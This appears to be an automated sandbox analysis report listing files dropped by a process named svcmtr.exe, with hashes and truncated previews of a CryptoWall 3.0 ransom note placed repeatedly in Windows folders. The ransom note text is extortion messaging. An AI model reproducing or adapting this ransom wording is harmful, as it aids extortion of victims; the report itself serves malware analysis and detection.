                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Microsoft\Windows\Start Menu\Programs\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Microsoft\Windows\Start Menu\Programs\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Microsoft\Windows\Start Menu\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Microsoft\Windows\Start Menu\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Microsoft\Windows\Templates\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Microsoft\Windows\Templates\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
